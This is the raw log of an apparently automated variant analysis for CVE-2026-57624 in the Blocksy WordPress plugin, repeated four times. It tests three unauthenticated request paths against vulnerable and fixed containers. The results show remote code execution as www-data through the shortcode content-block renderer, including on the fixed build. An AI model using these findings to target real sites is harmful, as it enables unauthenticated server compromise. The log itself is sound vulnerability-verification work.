=== CVE-2026-57624 variant analysis starting at Sun Jul 5 10:24:12 UTC 2026 === ROOT=/data/pruva/runs/c20a7fcc-5f55-4752-bfdb-af7da0b425ed/bundle [+] Reusing running repro stack: blocksycve-wp_fixed-1 / blocksycve-wp_vuln-1 [+] Containers: vuln=blocksycve-wp_vuln-1 (172.29.0.3) fixed=blocksycve-wp_fixed-1 (172.29.0.4) [+] Setting up variant posts on FIXED build... CB_ID=10 PAGE_ID=13 POPUP_ID=12 SV_ID=11 PAGE_SLUG=variant-shortcode-page SV_SLUG=variant-single-view-block [+] Setting up variant posts on VULN build... CB_ID=10 PAGE_ID=13 POPUP_ID=12 SV_ID=11 PAGE_SLUG=variant-shortcode-page SV_SLUG=variant-single-view-block [+] FIXED: cb=10 page_slug=variant-shortcode-page popup=12 sv_slug=variant-single-view-block [+] VULN: cb=10 page_slug=variant-shortcode-page popup=12 sv_slug=variant-single-view-block ========================================================== TEST1: ContentBlocksRenderer frontend path (shortcode page) — UNAUTHENTICATED GET ========================================================== --- FIXED --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data 7737f7e10e48n--- VULN --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data a537d333d13cn========================================================== TEST2: do_blocks single-view path (original repro surface) — UNAUTHENTICATED GET ========================================================== --- FIXED --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER --- VULN --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data a537d333d13cn========================================================== TEST3: popup AJAX endpoint (nopriv, nonce-less) — UNAUTHENTICATED POST admin-ajax.php ========================================================== --- FIXED --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER --- VULN --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER === RESULT MATRIX === | VULN (marker) | FIXED (marker) TEST1 CB renderer | 1 | 1 TEST2 single-view | 1 | 0 TEST3 popup AJAX | 0 | 0 Plugin versions: vuln=2.1.48 fixed=2.1.48 ; WordPress=7.0 Wrote runtime_manifest.json === boundary_ok=1 === === VARIANT BOUNDARY CONFIRMED: TEST1 (ContentBlocksRenderer) executes on FIXED (alternate trigger; intended behaviour); TEST2/TEST3 blocked on FIXED (fix works on its surface) === === CVE-2026-57624 variant analysis starting at Sun Jul 5 10:24:21 UTC 2026 === ROOT=/data/pruva/runs/c20a7fcc-5f55-4752-bfdb-af7da0b425ed/bundle [+] Reusing running repro stack: blocksycve-wp_fixed-1 / blocksycve-wp_vuln-1 [+] Containers: vuln=blocksycve-wp_vuln-1 (172.29.0.3) fixed=blocksycve-wp_fixed-1 (172.29.0.4) [+] Setting up variant posts on FIXED build... CB_ID=14 PAGE_ID=17 POPUP_ID=16 SV_ID=15 PAGE_SLUG=variant-shortcode-page SV_SLUG=variant-single-view-block [+] Setting up variant posts on VULN build... CB_ID=14 PAGE_ID=17 POPUP_ID=16 SV_ID=15 PAGE_SLUG=variant-shortcode-page SV_SLUG=variant-single-view-block [+] FIXED: cb=14 page_slug=variant-shortcode-page popup=16 sv_slug=variant-single-view-block [+] VULN: cb=14 page_slug=variant-shortcode-page popup=16 sv_slug=variant-single-view-block ========================================================== TEST1: ContentBlocksRenderer frontend path (shortcode page) — UNAUTHENTICATED GET ========================================================== --- FIXED --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data 7737f7e10e48n--- VULN --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data a537d333d13cn========================================================== TEST2: do_blocks single-view path (original repro surface) — UNAUTHENTICATED GET ========================================================== --- FIXED --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER --- VULN --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data a537d333d13cn========================================================== TEST3: popup AJAX endpoint (nopriv, nonce-less) — UNAUTHENTICATED POST admin-ajax.php ========================================================== --- FIXED --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER --- VULN --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER === RESULT MATRIX === | VULN (marker) | FIXED (marker) TEST1 CB renderer | 1 | 1 TEST2 single-view | 1 | 0 TEST3 popup AJAX | 0 | 0 Plugin versions: vuln=2.1.48 fixed=2.1.48 ; WordPress=7.0 Wrote runtime_manifest.json === boundary_ok=1 === === VARIANT BOUNDARY CONFIRMED: TEST1 (ContentBlocksRenderer) executes on FIXED (alternate trigger; intended behaviour); TEST2/TEST3 blocked on FIXED (fix works on its surface) === === CVE-2026-57624 variant analysis starting at Sun Jul 5 10:24:26 UTC 2026 === ROOT=/data/pruva/runs/c20a7fcc-5f55-4752-bfdb-af7da0b425ed/bundle [+] Reusing running repro stack: blocksycve-wp_fixed-1 / blocksycve-wp_vuln-1 [+] Containers: vuln=blocksycve-wp_vuln-1 (172.29.0.3) fixed=blocksycve-wp_fixed-1 (172.29.0.4) [+] Setting up variant posts on FIXED build... CB_ID=18 PAGE_ID=21 POPUP_ID=20 SV_ID=19 PAGE_SLUG=variant-shortcode-page SV_SLUG=variant-single-view-block [+] Setting up variant posts on VULN build... CB_ID=18 PAGE_ID=21 POPUP_ID=20 SV_ID=19 PAGE_SLUG=variant-shortcode-page SV_SLUG=variant-single-view-block [+] FIXED: cb=18 page_slug=variant-shortcode-page popup=20 sv_slug=variant-single-view-block [+] VULN: cb=18 page_slug=variant-shortcode-page popup=20 sv_slug=variant-single-view-block ========================================================== TEST1: ContentBlocksRenderer frontend path (shortcode page) — UNAUTHENTICATED GET ========================================================== --- FIXED --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data 7737f7e10e48n--- VULN --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data a537d333d13cn========================================================== TEST2: do_blocks single-view path (original repro surface) — UNAUTHENTICATED GET ========================================================== --- FIXED --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER --- VULN --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data a537d333d13cn========================================================== TEST3: popup AJAX endpoint (nopriv, nonce-less) — UNAUTHENTICATED POST admin-ajax.php ========================================================== --- FIXED --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER --- VULN --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER === RESULT MATRIX === | VULN (marker) | FIXED (marker) TEST1 CB renderer | 1 | 1 TEST2 single-view | 1 | 0 TEST3 popup AJAX | 0 | 0 Plugin versions: vuln=2.1.48 fixed=2.1.48 ; WordPress=7.0 Wrote runtime_manifest.json === boundary_ok=1 === === VARIANT BOUNDARY CONFIRMED: TEST1 (ContentBlocksRenderer) executes on FIXED (alternate trigger; intended behaviour); TEST2/TEST3 blocked on FIXED (fix works on its surface) === === CVE-2026-57624 variant analysis starting at Sun Jul 5 10:26:09 UTC 2026 === ROOT=/data/pruva/runs/c20a7fcc-5f55-4752-bfdb-af7da0b425ed/bundle [+] Reusing running repro stack: blocksycve-wp_fixed-1 / blocksycve-wp_vuln-1 [+] Containers: vuln=blocksycve-wp_vuln-1 (172.29.0.3) fixed=blocksycve-wp_fixed-1 (172.29.0.4) [+] Setting up variant posts on FIXED build... CB_ID=22 PAGE_ID=25 POPUP_ID=24 SV_ID=23 PAGE_SLUG=variant-shortcode-page SV_SLUG=variant-single-view-block [+] Setting up variant posts on VULN build... CB_ID=22 PAGE_ID=25 POPUP_ID=24 SV_ID=23 PAGE_SLUG=variant-shortcode-page SV_SLUG=variant-single-view-block [+] FIXED: cb=22 page_slug=variant-shortcode-page popup=24 sv_slug=variant-single-view-block [+] VULN: cb=22 page_slug=variant-shortcode-page popup=24 sv_slug=variant-single-view-block ========================================================== TEST1: ContentBlocksRenderer frontend path (shortcode page) — UNAUTHENTICATED GET ========================================================== --- FIXED --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data 7737f7e10e48n--- VULN --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data a537d333d13cn========================================================== TEST2: do_blocks single-view path (original repro surface) — UNAUTHENTICATED GET ========================================================== --- FIXED --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER --- VULN --- http=200 marker=1 echo=BLOCKSY_VARIANT_RCE::uid=33(www-data) gid=33(www-data) groups=33(www-data) VARIANT_RCE_CONFIRMEDnCMD_OUTPUT:nuid=33(www-data) gid=33(www-data) groups=33(www-data) www-data a537d333d13cn========================================================== TEST3: popup AJAX endpoint (nopriv, nonce-less) — UNAUTHENTICATED POST admin-ajax.php ========================================================== --- FIXED --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER --- VULN --- http=200 marker=0 echo= cat: /tmp/rce_marker_variant.txt: No such file or directory NO_MARKER === RESULT MATRIX === | VULN (marker) | FIXED (marker) TEST1 CB renderer | 1 | 1 TEST2 single-view | 1 | 0 TEST3 popup AJAX | 0 | 0 Plugin versions: vuln=2.1.48 fixed=2.1.48 ; WordPress=7.0 Wrote runtime_manifest.json === boundary_ok=1 === === VARIANT BOUNDARY CONFIRMED: TEST1 (ContentBlocksRenderer) executes on FIXED (alternate trigger; intended behaviour); TEST2/TEST3 blocked on FIXED (fix works on its surface) ===